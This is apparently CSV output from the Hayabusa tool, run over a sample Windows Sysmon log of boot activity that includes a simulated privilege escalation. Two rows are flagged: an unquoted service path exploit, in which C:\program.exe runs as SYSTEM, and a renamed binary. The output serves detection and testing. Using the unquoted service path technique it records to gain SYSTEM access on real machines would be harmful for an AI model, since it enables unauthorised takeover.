+2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
